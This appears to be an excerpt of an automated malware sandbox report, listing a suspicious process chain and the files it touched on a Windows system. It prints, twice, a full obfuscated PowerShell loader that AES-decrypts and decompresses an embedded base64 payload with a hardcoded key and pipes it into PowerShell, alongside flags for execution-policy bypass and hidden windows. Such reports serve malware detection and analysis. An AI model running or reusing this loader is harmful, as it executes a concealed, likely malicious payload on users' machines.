parent_process | powershell.exe | martian_process | C:\Windows\System32\cmd.exe /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |